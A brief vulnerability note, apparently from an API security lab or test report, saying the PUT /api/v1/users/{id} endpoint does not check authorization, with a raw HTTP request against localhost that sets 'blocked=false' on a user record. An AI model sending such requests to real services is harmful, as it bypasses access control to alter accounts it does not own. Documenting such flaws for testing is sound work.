PUT /api/v1/users/{id}
API doesn’t properly check the authorizaion.
PUT /api/v1/users/{id} HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: application/vnd.api+json
Authorization: Bearer {JWT}
Cache-Control: no-cache
Host: localhost:8888
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 13
blocked=false